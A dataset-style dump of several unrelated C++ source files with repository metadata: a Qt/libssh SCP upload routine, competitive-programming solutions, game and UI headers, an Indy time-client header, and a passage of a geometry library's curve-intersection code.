QSshPush::QSshPush(const QString& from_localPath, const QString& to_remotePath, ssh_session s)
: m_session(s), localPath(from_localPath), remotePath(to_remotePath)
{
}
bool QSshPush::handle()
{
bool ok = false;
// attempt to create new scp from ssh session.
ssh_scp scpSession = ssh_scp_new(m_session, SSH_SCP_WRITE, remotePath.toStdString().c_str());
// if creation failed, return
if (scpSession == NULL)
error(this);
else {
// attempt to initialize new scp session.
int scpInitialized = ssh_scp_init(scpSession);
// if failed, close scp session and return.
if(scpInitialized != SSH_OK)
error(this);
else {
// open the local file and check to make sure it exists
// if not, close scp session and return.
QFile file(localPath);
// if the file does exist, read all contents as bytes
if(!file.open(QIODevice::ReadOnly))
error(this);
else
{
QByteArray buffer = file.readAll();
file.close();
// attempt to authorize pushing bytes over scp socket
// if this fails, close scp session and return.
if (ssh_scp_push_file(scpSession, remotePath.toStdString().c_str(), buffer.size(), S_IRUSR | S_IWUSR) != SSH_OK)
error(this);
// once authorized to push bytes over scp socket, start writing
// if an error is returned, close scp session and return.
else if ( (ok = ssh_scp_write(scpSession, buffer.data(), buffer.size() ) == SSH_OK))
success(this);
else
error(this);
}
}
// close scp session and return.
ssh_scp_close(scpSession);
ssh_scp_free(scpSession);
}
return ok;
}
|
77a964333d20c20794df53ed6fc4c6cddb0d6e5a
|
9f0f9eb2936152f85e065d3bf41f6c1cdedb2e27
|
/UVA10048.cpp
|
e7c21549d9d0cb5187ba3afea5aadb8f7717500a
|
[
"MIT"
] |
permissive
|
MaSteve/UVA-problems
|
f613f783d32c04578fb6f59666f1e35dfc37d0a7
|
3a240fcca02e24a9c850b7e86062f8581df6f95f
|
refs/heads/master
| 2020-04-04T07:16:22.582629
| 2018-01-11T17:24:07
| 2018-01-11T17:24:07
| 47,360,461
| 19
| 6
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 2,230
|
cpp
|
UVA10048.cpp
|
#include <iostream>
#include <string>
#include <vector>
#include <queue>
#include <unordered_map>
#include <utility>
using namespace std;
typedef pair<int, int> ii;
typedef pair<int, ii> street;
typedef vector<int> vi;
struct ufds {
vi p, r; int numSets;
ufds(int N) {
p.assign(N, 0); r.assign(N, 0); numSets = N;
for (int i = 0; i < N; i++) p[i] = i;
}
int findSet(int i) { return (p[i]==i)? i: (p[i]=findSet(p[i])); }
bool isSameSet(int i, int j) { return findSet(i) == findSet(j); }
void unionSet(int i, int j) {
int x = findSet(i), y = findSet(j);
if (x != y) {
if (r[x] > r[y]) p[y] = x;
else {
p[x] = y;
if (r[x] == r[y]) r[y]++;
} numSets--;
}
}
};
priority_queue<street> pq;
int main() {
bool first = false;
int C, S, Q, c = 1;
while (cin >> C >> S >> Q && !(C == 0 && S == 0 && Q == 0)) {
if (first) printf("\n");
else first = true;
for (int i = 0; i < S; i++) {
int c1, c2, d;
cin >> c1 >> c2 >> d;
street s = make_pair(-d, make_pair(c1-1, c2-1));
pq.push(s);
}
ufds u(C);
unordered_map<int, int> noise;
while (!pq.empty()) {
if (!u.isSameSet(pq.top().second.first, pq.top().second.second)) {
for (int i = 0; i < C; i++) {
if (u.isSameSet(pq.top().second.first, i))
for (int j = 0; j < C; j++) {
if (u.isSameSet(pq.top().second.second, j))
noise[i*1000+j] = noise[i+1000*j] = max(noise[i*1000+pq.top().second.first], max(noise[j*1000+pq.top().second.second], -pq.top().first));
}
}
u.unionSet(pq.top().second.first, pq.top().second.second);
}
pq.pop();
}
printf("Case #%d\n", c);
c++;
while (Q--) {
int c1, c2;
cin >> c1 >> c2;
c1--, c2--;
if (u.isSameSet(c1, c2)) printf("%d\n", noise[c1*1000 + c2]);
else printf("no path\n");
}
}
return 0;
}
|
c90b89e1a75df28cd74ed35edaf572c6874b8238
|
107390cabe9c466c7c68a90554763b5a1699b395
|
/CppModule04/ex03/MateriaSource.hpp
|
bd3305a99e9bd452210261494274aa34d99aa66b
|
[] |
no_license
|
europaplus/CPP_modules
|
756d4700f99f0a16d814c637088e94b75f4370d2
|
6d7794bc70f89f8c4e5aa2f82aed78a7c40563df
|
refs/heads/master
| 2023-05-10T07:30:02.911933
| 2021-06-13T16:13:26
| 2021-06-13T16:13:26
| 376,586,094
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 1,248
|
hpp
|
MateriaSource.hpp
|
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* MateriaSource.hpp :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: knfonda <knfonda@student.21-school.ru> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2021/03/26 16:36:02 by knfonda #+# #+# */
/* Updated: 2021/03/27 13:12:39 by knfonda ### ########.fr */
/* */
/* ************************************************************************** */
#ifndef MATERIASOURCE_H
# define MATERIASOURCE_H
# include "IMateriaSource.hpp"
class MateriaSource : public IMateriaSource
{
private:
AMateria *_source[4];
int _countMateria;
const int _maxCntMateria;
public:
MateriaSource();
~MateriaSource();
void learnMateria(AMateria *);
AMateria *createMateria(std::string const &type);
};
#endif
|
6c7f0286402dc1f0c5321ebc9005ab8d46124fe6
|
e845f9d00689489e28e1bcd80044307d2839b816
|
/classes/Ability.cpp
|
a262b34befaccdeb582b5a8f9c3ddc042337362e
|
[] |
no_license
|
georgreichert/ascendiiSampleGame
|
d562f201a2999820b16bb0104f0775a561722409
|
7063a522c0f3bff42279c2b0b9c5885b0ccd1e70
|
refs/heads/main
| 2023-03-31T08:11:50.199219
| 2021-04-06T18:20:27
| 2021-04-06T18:20:27
| 352,204,849
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 450
|
cpp
|
Ability.cpp
|
#include "../headers/fightclub.h"
Ability::Ability(std::string name, float power, float defense, float random) {
this->power = power;
this->defense = defense;
this->random = random;
this->name = name;
}
float Ability::getPower() {
return this->power;
}
float Ability::getDefense() {
return this->defense;
}
float Ability::getRandom() {
return this->random;
}
std::string Ability::getName() {
return this->name;
}
|
8790450a740575115e38da9fe788e0ea41e90365
|
a756eed9030c5afa645436412d777a1774357c70
|
/dsa/Trees/extra.cpp
|
b079896a827e6921f3034900fcdad271e3fcb81d
|
[] |
no_license
|
jainsourav43/DSA
|
fc92faa7f8e95151c8f0af4c69228d4db7e1e5ce
|
deb46f70a1968b44bb28389d01b35cb571a8c293
|
refs/heads/master
| 2021-05-25T09:13:42.418930
| 2020-06-30T07:36:56
| 2020-06-30T07:36:56
| 126,943,860
| 0
| 1
| null | 2020-06-30T07:36:57
| 2018-03-27T07:07:51
|
C++
|
UTF-8
|
C++
| false
| false
| 884
|
cpp
|
extra.cpp
|
//bptr search_par(bptr t,bptr par)
//{
// static int ch=0;
// if(t->key[0]>k)
// {
// par=t;
// search_par(t->ptr[0],par);
// }
// else if(t->key[0]<k)
// {
// for(i=0;i<=t->count;i++)
// {
// if(t->key[i]<k)
// {
// continue;
// }
// else if(t->key[i]>k)
// {
// check=1;
// ch++;
// par =t;
// search(t->ptr[i],par);
// }
// else if(t->key[i]==k)
// {
// if(ch==0)
// par=null;
// return par;
// }
// if(check==0)
// {par =t;
// ch++;
// search(t->ptr[i],par);
// }
// }
//}
// in=0;
// while(t->key[in]<k)
// {
// if(in<=2)
// {
// t2->ptr[in]=t->ptr[in];
// }
// else if(in>2)
// {
// t3->ptr[in]=t->ptr[in];
// }
// in++;
// }
// if(in<2)
// {
// t2->ptr[in]=
// }
// t->count=0;
// t->ptr[0]=t2;
// t->ptr[1]=t3;
// t->key[0]=a[2];
// }
|
41edc4c25a5f638a57f97224ba668d6d86b89b6c
|
bc8e83e8f447e84cd5bb03e9872347e8893e1ead
|
/olympiads school/2020 Winter Break Practice/bobs-splitting-a-sequence.cpp
|
9aec0a7aa99631484e8e5773b939f09114fd689f
|
[] |
no_license
|
plasmatic1/other-judge-solutions
|
c04861f843f9122b7b69f1bc00fd4a5a839c8473
|
4702e0ddaa9243acd71a1ac241fe8dd3e72ce06a
|
refs/heads/master
| 2022-09-30T08:39:54.284860
| 2022-08-29T03:41:32
| 2022-08-29T03:41:32
| 214,307,016
| 1
| 1
| null | 2021-04-06T16:56:43
| 2019-10-11T00:00:25
|
C++
|
UTF-8
|
C++
| false
| false
| 2,385
|
cpp
|
bobs-splitting-a-sequence.cpp
|
// ./bobs-splitting-a-sequence.yml
#include "bits/stdc++.h"
using namespace std;
// Defines
#define fs first
#define sn second
#define pb push_back
#define eb emplace_back
#define mpr make_pair
#define mtp make_tuple
#define all(x) (x).begin(), (x).end()
// Basic type definitions
using ll = long long; using ull = unsigned long long; using ld = long double;
using pii = pair<int, int>; using pll = pair<long long, long long>;
#ifdef __GNUG__
// PBDS order statistic tree
#include <ext/pb_ds/assoc_container.hpp> // Common file
#include <ext/pb_ds/tree_policy.hpp>
using namespace __gnu_pbds;
template <typename T, class comp = less<T>> using os_tree = tree<T, null_type, comp, rb_tree_tag, tree_order_statistics_node_update>;
template <typename K, typename V, class comp = less<K>> using treemap = tree<K, V, comp, rb_tree_tag, tree_order_statistics_node_update>;
// HashSet
#include <ext/pb_ds/assoc_container.hpp>
template <typename T, class Hash> using hashset = gp_hash_table<T, null_type, Hash>;
template <typename K, typename V, class Hash> using hashmap = gp_hash_table<K, V, Hash>;
const ll RANDOM = chrono::high_resolution_clock::now().time_since_epoch().count();
struct chash { ll operator()(ll x) const { return x ^ RANDOM; } };
#endif
// More utilities
int SZ(string &v) { return v.length(); }
template <typename C> int SZ(C &v) { return v.size(); }
template <typename C> void UNIQUE(vector<C> &v) { sort(v.begin(), v.end()); v.resize(unique(v.begin(), v.end()) - v.begin()); }
template <typename T, typename U> void maxa(T &a, U b) { a = max(a, b); }
template <typename T, typename U> void mina(T &a, U b) { a = min(a, b); }
const ll INF = 0x3f3f3f3f, LLINF = 0x3f3f3f3f3f3f3f3f;
const int MN = 1e5 + 1;
int N;
ll psum[MN];
int main() {
ios_base::sync_with_stdio(false);
cin.tie(NULL);
cin >> (N);
for (auto i = 1; i <= N; i++) cin >> psum[i];
for (auto i = 1; i <= N; i++) psum[i] += psum[i-1];
ll ans = LLINF;
for (auto i = 1; i <= N-2; i++) {
ll a = psum[i], want = (psum[N] - psum[i]) / 2 + psum[i];
int idx = lower_bound(psum + i + 1, psum + N, want) - psum;
for (int j = max(idx-5, i+1); j <= min(idx+5, N-1); j++) {
ll A[3] = {a, psum[j] - psum[i], psum[N] - psum[j]};
sort(A, A + 3);
mina(ans, A[2] - A[0]);
}
}
cout << (ans) << '\n';
return 0;
}
|
7f04cfd6cd6edae089b1e78aae77119c6ab4d43e
|
e1de41ce287bbd0181b92f4746290233c4bb7755
|
/client/Classes/View/MailListTile.h
|
02269076e06fd3f939e5f1b96d38c2b187f6d175
|
[] |
no_license
|
yf0994/game-DarkWar
|
c7572cb80eced4356a0faadbd1a4b97d1b90f2ce
|
ba39e4b57c381e9a4e969b2ed58990bc1cfd94a9
|
refs/heads/master
| 2021-05-29T15:47:01.214082
| 2015-08-29T03:28:06
| 2015-08-29T03:28:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 1,807
|
h
|
MailListTile.h
|
#ifndef __MailListTile__
#define __MailListTile__
#include <iostream>
#include "cocos2d.h"
#include <string.h>
#include "ListMenu.h"
#include "MailTanChuLayer.h"
#include "EmailManager.h"
USING_NS_CC;
using namespace std;
class MailListTile:public CCLayer
{
public:
CREATE_FUNC(MailListTile);
MailListTile();
~MailListTile();
virtual bool init();
virtual void onEnter();
virtual void onExit();
void setSystemMail(Email mail);
void selectDelete(CCObject* obj);//选择删除按钮
void selectCheckInfo(CCObject *obj);//查看详情
void selectOK(CCObject* obj);//选择接受按钮
void selectCancel(CCObject *obj);//选择拒绝
inline void setMenuHandler(CCObject *obj,SEL_MenuHandler checkInfo,SEL_MenuHandler clickDelete,SEL_MenuHandler clickOK,SEL_MenuHandler clickCancel)
{
m_oTarger = obj;
m_hCheckInfo = checkInfo;
m_hClickDelete = clickDelete;
m_hClickOK = clickOK;
m_hClickCancel = clickCancel;
}
inline void setMenuTanChuCallBack()
{
m_lMailTanChuLayer = NULL;
CCMenuItem *obj = CCMenuItem::create();
obj->setTag(m_sSystemMail.email_id);
(m_oTarger->*m_hCheckInfo)(obj);
}
void checkInfoOK();
void clickDeleteOK(CCObject *obj);
void clickOKOK(CCObject *obj);
void clickCancelOK(CCObject *obj);
void refresh();
// 添加消息监听
void addObserver(SEL_CallFuncO selector,const char *name);
// 移除消息监听
void removeObserver(const char *name);
void getMessage(CCObject *obj);
private:
ListMenu *m_mMenu;
int m_nHeight;
int m_nSide;
int m_nCount;
ccColor3B m_cTTFColor;
Email m_sSystemMail;
CCSprite *m_sBgSpr;
CCObject *m_oTarger;
SEL_MenuHandler m_hCheckInfo;
SEL_MenuHandler m_hClickDelete;
SEL_MenuHandler m_hClickOK;
SEL_MenuHandler m_hClickCancel;
MailTanChuLayer *m_lMailTanChuLayer;
};
#endif
|
8d4953503198dce4c84ee5525ae42d76f426fdd9
|
f7ce06262eb4c9d0e1a9abcfbfdf3b7c20d8a015
|
/Horario.cpp
|
5712a4e61d169a48efa8ecb13e75eb81f7ebe992
|
[] |
no_license
|
CT-junior/Porta
|
2ac6437a78c8a062eaae2d4004d390f5166bdcb0
|
8fe5ef7d21da2d77469a818a2b29db0aae3135fb
|
refs/heads/master
| 2022-06-30T19:26:03.658805
| 2020-01-10T23:32:59
| 2020-01-10T23:32:59
| 226,109,231
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 354
|
cpp
|
Horario.cpp
|
#include "Horario.h"
Horario::Horario(String hora, String saida){
entrada = hora;
saida = saida;
}
String Horario::get_entrada(){
return entrada;
}
String Horario::get_saida(){
return saida;
}
void Horario::set_entrada(String hora){
entrada = hora;
}
void Horario::set_saida(String hora){
saida = hora;
}
|
c02886c881a58e0a59db8ea6bee79d6bd3d61c23
|
97378cf1b76fb0711d3c04b283dbcb3a14921937
|
/String/1255 - Substring Frequency/1255 - Substring Frequency.cpp
|
4169e8641ddc5ab153e256d6836a5b22ebd5808d
|
[] |
no_license
|
ashrafulDUET/lightoj
|
af3b189f0f8cd385826f63548881c501bcaba906
|
7b1780afed695c479dee7f34277e0c3a3b839534
|
refs/heads/master
| 2021-09-27T16:10:19.983784
| 2018-11-09T13:06:07
| 2018-11-09T13:06:07
| 109,361,693
| 1
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 573
|
cpp
|
1255 - Substring Frequency.cpp
|
#include<bits/stdc++.h>
using namespace std;
int main()
{
// freopen("in","r",stdin);
// freopen("out","w",stdout);
long long int a,b,n,m,i,j,ck=0,ln,ln2;
string FirstStr,subStr;
cin>>n;
for(i=1; i<=n; i++){
cin>>FirstStr;
ln = FirstStr.length();
cin>>subStr;
ln2 = subStr.length();
for(j=0; j<ln; j++){
if(FirstStr.compare(j,ln2,subStr)==0){ //Substring Compare UsingBuildinFuc
ck++;
}
}
printf("Case %lld: %lld\n",i, ck);
ck=0;
}
}
|
fd2f84b67c133d5bc3297b6fcf61b2ec64de8367
|
8dfe4bef840a00972ebe18634bbf28636dec9949
|
/FKCWLib/FKCW_TMX/Include/FKCW_TMX_Layer.h
|
2795b78f8d703f9e5157d01e645570828e3a67ed
|
[] |
no_license
|
pingfanJerry/FKCocos2dxWrapper_2.x
|
ba644308746557e99f8fa201a832aafa7e806927
|
2ff906f10a030d7a2dbe968ba9d17798e2537a37
|
refs/heads/master
| 2020-03-10T16:58:40.391923
| 2017-03-16T06:43:05
| 2017-03-16T06:43:05
| 129,487,589
| 1
| 0
| null | 2018-04-14T06:12:13
| 2018-04-14T06:12:13
| null |
GB18030
|
C++
| false
| false
| 5,506
|
h
|
FKCW_TMX_Layer.h
|
//*************************************************************************
// 创建日期: 2014-12-29
// 文件名称: FKCW_TMX_Layer.h
// 创 建 人: 王宏张 FreeKnight
// 版权所有: MIT
// 说 明:
//*************************************************************************
#pragma once
//-------------------------------------------------------------------------
#include "FKCW_TMX_Macros.h"
//-------------------------------------------------------------------------
class FKCW_TMX_MapInfo;
class FKCW_TMX_LayerInfo;
class FKCW_TMX_TileSetInfo;
class FKCW_TMX_SpriteBatchNode;
//-------------------------------------------------------------------------
class FKCW_TMX_Layer : public CCNodeRGBA
{
private:
typedef struct {
int atlasIndex;
int tilesetIndex;
} STileSetAtlasInfo;
private:
int* m_tiles; // GridID列表
CCSprite* m_reusedTile;
private:
// 当Index大于指定值,则减少它
void decreaseIndexIfMoreThan(int tilesetIndex, int index);
// 当Index小于指定值,则增加他
void increaseIndexIfEqualOrMoreThan(int tilesetIndex, int index);
// 添加一个CCSprite到Tile中
void setupTileSprite(CCSprite* sprite, CCPoint pos, int gid);
// 获取复用的Tile
CCSprite* reusedTile(CCRect rect, FKCW_TMX_SpriteBatchNode* bn);
protected:
FKCW_TMX_Layer(int layerIndex, FKCW_TMX_MapInfo* mapInfo);
// 在直角地图中获取一个Tile的左下角像素坐标
CCPoint getPositionForOrthoAt(int posX, int posY);
// 在斜45地图中获取一个Tile的左下角像素坐标
CCPoint getPositionForIsoAt(int posX, int posY);
// 在六边形地图中获取一个Tile的左下角像素坐标
CCPoint getPositionForHexAt(int posX, int posY);
// 获取一个Tile的Z值
float getVertexZAt(int x, int y);
// 添加一个Tile
void appendTileForGid(int tilesetIndex, int gid, int x, int y);
// 设置一个Tile属性
void setTileAt(int tilesetIndex, int gid, int x, int y, int z);
// 解析属性
void parseInternalProperties();
// 计算Tile相对于所在层的像素偏移值
CCPoint calculateLayerOffset(float x, float y);
// 初始化GridIndex
void setupTiles();
public:
virtual ~FKCW_TMX_Layer();
// 创建Layer,Index从0开始叠加
static FKCW_TMX_Layer* create(int layerIndex, FKCW_TMX_MapInfo* mapInfo);
// 获取层属性
string getProperty(const string& key);
// 根据相对于Layer的偏移像素位置,返回Tile的位置编号值
CCPoint getTileCoordinateAt(float x, float y);
// 根据给定的Tile的位置编号值,获取Tile
// 返回时会同时将返回的CCSprite,该Sprite已经添加到Layer中
// 可以调用 layer->removeChild(sprite, true); 或者layer->removeTileAt(x, y);来进行删除
CCSprite* tileAt(int x, int y);
// 从Layer删除一个Tile
void removeTile(CCSprite* sprite);
// 根据Tile的编号值获取其GridID
int getGidAt(int x, int y);
// 获取一份GridID数组
// 这个数组大小为 layerWidth * layerHeight
const int* getGids();
// 拷贝一份GridID数组
// 调用者需要释放这个返回的指针
const int* copyGids();
// 删除指定位置的Tile
void removeTileAt(int x, int y);
// 设置指定Tile位置,若Tile存在,则相等于updateTileAt
void setTileAt(int gid, int x, int y);
// 更新指定Tile位置,若Tile不存在,则添加新Tile
void updateTileAt(int gid, int x, int y);
// 获取指定Tile相对于所在Layer的左下角位置
CCPoint getPositionAt(int x, int y);
// 更变指定Tile的颜色
void setTileColorAt(ccColor4B c, int x, int y);
public:
CC_SYNTHESIZE(int, m_layerWidth, LayerWidth); // Layer宽度(Tiles个数)
CC_SYNTHESIZE(int, m_layerHeight, LayerHeight); // Layer高度(Tiles个数)
CC_SYNTHESIZE(int, m_tileWidth, TileWidth); // Layer宽度(像素值)
CC_SYNTHESIZE(int, m_tileHeight, TileHeight); // Layer高度(像素值)
CC_SYNTHESIZE(int, m_minGid, MinGid); // 最小GridID
CC_SYNTHESIZE(int, m_maxGid, MaxGid); // 最大GridID
CC_SYNTHESIZE(FKCW_TMX_MapInfo*, m_mapInfo, MapInfo);
CC_SYNTHESIZE(FKCW_TMX_LayerInfo*, m_layerInfo, LayerInfo);
CC_SYNTHESIZE(STileSetAtlasInfo*, m_atlasInfos, AtlasInfos);
CC_SYNTHESIZE(FKCW_TMX_SpriteBatchNode**, m_batchNodes, BatchNodes); // BatchNode组
CC_SYNTHESIZE_BOOL(m_useAutomaticVertexZ, UseAutomaticVertexZ); // 自定义计算Z值
CC_SYNTHESIZE(float, m_vertexZ, VertexZ); // 调整后的顶点Z值
CC_SYNTHESIZE(float, m_alphaFuncValue, AlphaFuncValue); // Alpha值
};
//-------------------------------------------------------------------------
class FKCW_TMX_SpriteBatchNode : public CCSpriteBatchNode
{
friend class FKCW_TMX_Layer;
public:
FKCW_TMX_SpriteBatchNode();
virtual ~FKCW_TMX_SpriteBatchNode();
static FKCW_TMX_SpriteBatchNode* createWithTexture(CCTexture2D* tex, unsigned int capacity);
static FKCW_TMX_SpriteBatchNode* createWithTexture(CCTexture2D* tex) {
return FKCW_TMX_SpriteBatchNode::createWithTexture(tex, kDefaultSpriteBatchCapacity);
}
static FKCW_TMX_SpriteBatchNode* create(const char* fileImage, unsigned int capacity);
static FKCW_TMX_SpriteBatchNode* create(const char* fileImage) {
return FKCW_TMX_SpriteBatchNode::create(fileImage, kDefaultSpriteBatchCapacity);
}
};
//-------------------------------------------------------------------------
|
c2149c88e88ab4e5ad81215bd63726b3abe4781a
|
948a6bbb8ef60a97c4350bf1fbccbc972bbfcb4f
|
/thirdparty/Indy10/C18/Win32/Release/IdTimeUDP.hpp
|
22f1cf53967b457d2592822e6c62dd1293a15272
|
[] |
no_license
|
hotsoft/components
|
504c6935b892c74796a8cbec91736185507ed149
|
2d41768ff68c0c6535a1ee40f3e8abc90cb19c9b
|
refs/heads/master
| 2023-09-03T22:46:13.153273
| 2023-08-18T13:16:19
| 2023-08-18T13:16:19
| 14,142,719
| 5
| 1
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 2,970
|
hpp
|
IdTimeUDP.hpp
|
// CodeGear C++Builder
// Copyright (c) 1995, 2013 by Embarcadero Technologies, Inc.
// All rights reserved
// (DO NOT EDIT: machine generated header) 'IdTimeUDP.pas' rev: 25.00 (Windows)
#ifndef IdtimeudpHPP
#define IdtimeudpHPP
#pragma delphiheader begin
#pragma option push
#pragma option -w- // All warnings off
#pragma option -Vx // Zero-length empty class member
#pragma pack(push,8)
#include <System.hpp> // Pascal unit
#include <SysInit.hpp> // Pascal unit
#include <System.Classes.hpp> // Pascal unit
#include <IdGlobal.hpp> // Pascal unit
#include <IdAssignedNumbers.hpp> // Pascal unit
#include <IdUDPBase.hpp> // Pascal unit
#include <IdGlobalProtocols.hpp> // Pascal unit
#include <IdUDPClient.hpp> // Pascal unit
#include <IdComponent.hpp> // Pascal unit
#include <IdBaseComponent.hpp> // Pascal unit
//-- user supplied -----------------------------------------------------------
namespace Idtimeudp
{
//-- type declarations -------------------------------------------------------
class DELPHICLASS TIdCustomTimeUDP;
class PASCALIMPLEMENTATION TIdCustomTimeUDP : public Idudpclient::TIdUDPClient
{
typedef Idudpclient::TIdUDPClient inherited;
protected:
System::TDateTime FBaseDate;
unsigned FRoundTripDelay;
unsigned __fastcall GetDateTimeCard(void);
System::TDateTime __fastcall GetDateTime(void);
virtual void __fastcall InitComponent(void);
public:
__fastcall TIdCustomTimeUDP(System::Classes::TComponent* AOwner)/* overload */;
bool __fastcall SyncTime(void);
__property unsigned DateTimeCard = {read=GetDateTimeCard, nodefault};
__property System::TDateTime DateTime = {read=GetDateTime};
__property unsigned RoundTripDelay = {read=FRoundTripDelay, nodefault};
public:
/* TIdUDPClient.Destroy */ inline __fastcall virtual ~TIdCustomTimeUDP(void) { }
public:
/* TIdInitializerComponent.Create */ inline __fastcall TIdCustomTimeUDP(void)/* overload */ : Idudpclient::TIdUDPClient() { }
};
class DELPHICLASS TIdTimeUDP;
class PASCALIMPLEMENTATION TIdTimeUDP : public TIdCustomTimeUDP
{
typedef TIdCustomTimeUDP inherited;
__published:
__property System::TDateTime BaseDate = {read=FBaseDate, write=FBaseDate};
__property Port = {default=37};
public:
/* TIdCustomTimeUDP.Create */ inline __fastcall TIdTimeUDP(System::Classes::TComponent* AOwner)/* overload */ : TIdCustomTimeUDP(AOwner) { }
public:
/* TIdUDPClient.Destroy */ inline __fastcall virtual ~TIdTimeUDP(void) { }
public:
/* TIdInitializerComponent.Create */ inline __fastcall TIdTimeUDP(void)/* overload */ : TIdCustomTimeUDP() { }
};
//-- var, const, procedure ---------------------------------------------------
} /* namespace Idtimeudp */
#if !defined(DELPHIHEADER_NO_IMPLICIT_NAMESPACE_USE) && !defined(NO_USING_NAMESPACE_IDTIMEUDP)
using namespace Idtimeudp;
#endif
#pragma pack(pop)
#pragma option pop
#pragma delphiheader end.
//-- end unit ----------------------------------------------------------------
#endif // IdtimeudpHPP
|
b1a1aa87a111776b086ff48467620c0fcbe5330b
|
47fb53066a178fecee386fb8ca0ab942392c34b7
|
/src/mg/mgcurve2.cpp
|
62e7ac573a03adbdacd5078ab5d413e258bc159d
|
[] |
no_license
|
zephyrer/mgcl
|
9eae7017ca728c6c565a74d16229146fa5e877f3
|
c63b24d5c5f0423acffe84bd4a2208ab2629d2f8
|
refs/heads/master
| 2020-05-20T04:17:24.355869
| 2018-08-18T08:35:42
| 2018-08-18T08:35:42
| 40,066,710
| 1
| 1
| null | null | null | null |
SHIFT_JIS
|
C++
| false
| false
| 18,073
|
cpp
|
mgcurve2.cpp
|
/********************************************************************/
/* Copyright (c) 2011 DG Technologies Inc. and Yuzi Mizuno */
/* All rights reserved. */
/* Granted under the MIT license (see mg/MGCL.h for detail) */
/********************************************************************/
#include "MGCLStdAfx.h"
#include "mg/Box.h"
#include "mg/Position.h"
#include "mg/Curve.h"
#include "mg/CompositeCurve.h"
#include "mg/CurveParameter.h"
#include "mg/CCisect_list.h"
#include "mg/CSisect_list.h"
#include "mg/FSurface.h"
#include "mg/Tolerance.h"
//#if defined(_DEBUG)
//#define new DEBUG_NEW
//#undef THIS_FILE
//static char THIS_FILE[] = __FILE__;
//#endif
#define SIN8DEG 0.022 //SIN8DEG=squaer of sin(8 degree).
//Private class for MGCurve::common(),
//Stores the information if the point of a curve's parameter value para is
//on the other curve or not. When the point is start or end point,
//the point is registered as off the curve if the two curves directions are
//opposite and one curve is departing from the other curve.
class MGCommonON{
public:
MGCommonON(const MGCurve& curve1,const MGCurve& curve2,
bool is_curve1Para, //indicate if para is curve1's parameter or curve2.
double para,
int para_is_SE=0
//=-1, or 1 if para is the start(-1) or end(1) parameter of curve1 or 2.
//=0 means para is a mid point.
);
MGCommonON(int ondata=0, double para1=0., double para2=0.)
:m_on(ondata), m_param1(para1), m_param2(para2){;};
//Test if the param1 of this is in between the param1 of prev and next.
bool in_between(const MGCommonON& prev, const MGCommonON& next)const{
return prev.param1()<m_param1 && m_param1<next.param1();
};
//Get next data of this, given curve1's next parameter t1.
MGCommonON get_next(double t1, const MGCurve& curve1, const MGCurve& curve2)const;
void set_on(int ondata=1){m_on=ondata;};
int on()const{return m_on;};
bool on_and_in_between(const MGCommonON& prev, const MGCommonON& next)const{
return m_on && in_between(prev,next);};
double param1()const{return m_param1;};
double param2()const{return m_param2;};
private:
int m_on;//=0: two points are different points.
//=1: two points are the same points.
double m_param1, m_param2;//parameter values of two curves when m_on is true.
};
MGCommonON::MGCommonON(
const MGCurve& curve1,const MGCurve& curve2,
bool is_curve1Para, //indicate if para is curve1's parameter or curve2.
double para,
int para_is_SE //=-1, or 1 if para is the start(-1) or end(1) parameter of curve1 or 2.
//=0 means para is a mid point.
):m_on(0){
const MGCurve* para_curve; const MGCurve* other_curve;
double* para_param; double* other_param;
if(is_curve1Para){
para_curve=&curve1; other_curve=&curve2;
para_param=&m_param1; other_param=&m_param2;
}else{
para_curve=&curve2; other_curve=&curve1;
para_param=&m_param2; other_param=&m_param1;
}
*para_param=para;
double& t=*other_param;
if(other_curve->on(para_curve->eval(para),t)){
double perror=other_curve->param_error();
int pra_is_SE_other=0;
double ts=other_curve->param_s(), te=other_curve->param_e();
if((t-ts)<=perror){
pra_is_SE_other=-1;
t=ts;
}else if((te-t)<=perror){
pra_is_SE_other=1;
t=te;
}
MGVector v1=para_curve->eval(para,1), v2=other_curve->eval(t,1);
MGVector v12=v1*v2;
if((v12%v12) <= (v1%v1)*(v2%v2)*SIN8DEG){
//v1 and v2 are parallel.
if(para_is_SE){
if(para_is_SE*pra_is_SE_other>0 && v1%v2<0.)
return;
if(para_is_SE*pra_is_SE_other<0 && v1%v2>0.)
return;
}
m_on=1;
}
}
}
MGCommonON MGCommonON::get_next(
double t1,//next parameter of curve1 to get next MGCommonON.
const MGCurve& curve1, const MGCurve& curve2
)const{
MGPosition pos=curve1.eval(t1);
//のっているかどうか調べるのにOnではなくperp_guessを使用している
double t2=param2();
int found = curve2.perp_guess(1.,0.,pos,t2,t2);
MGCommonON next(0,t1,t2);
if(found){
if(pos == curve2.eval(t2))
next.set_on();//t2 is not on this curve.
}
return next;
}
#define m_nMaxCommonEdge 4 //共通エッジは4個までしか求めない
//関数名: common
//目的:与えられた曲線と自身の共通部分があるかどうか調べる。
//引数:
// const MGCurve& curve2, (I/ ) 与えられる曲線
// std::vector<double>& vecComSpan ( /O) 共通部分のパラメータ範囲
// 4nの配列で、vecComSpan(4*i+0),vecComSpan(4*i+1)が自身のパラメータ範囲
// (vecComSpan(4*i+0) < vecComSpan(4*i+1))、
// vecComSpan(4*i+2),vecComSpan(4*i+3)がcurve2のパラメータ範囲
//戻り値:
// 共通部分の数: 共通部分が求まった
// 0: 共通部分がなかった
// -1: 共通エッジの収束計算エラー
// -2: 共通エッジが4個以上求まった(のっていないと見なす)
//追記:
// 曲線が共通かどうかの誤差にはline_zero()を、パラメータ範囲の収束計算の誤差には、
// パラメータ範囲*rc_zero()を使用した
int MGCurve::common(
const MGCurve& curve2,
std::vector<double>& vecComSpan
)const{
vecComSpan.clear();
const MGCompositeCurve* compo=dynamic_cast<const MGCompositeCurve*>(&curve2);
size_t nv2=0;
std::vector<double> vec2;
if(compo){
compo->common(*this,vec2);
nv2=vec2.size();
if(!nv2)
return 0;
}else{
const MGTrimmedCurve* trim=dynamic_cast<const MGTrimmedCurve*>(&curve2);
if(trim){
trim->common(*this,vec2);
nv2=vec2.size();
if(!nv2)
return 0;
}
}
if(nv2){
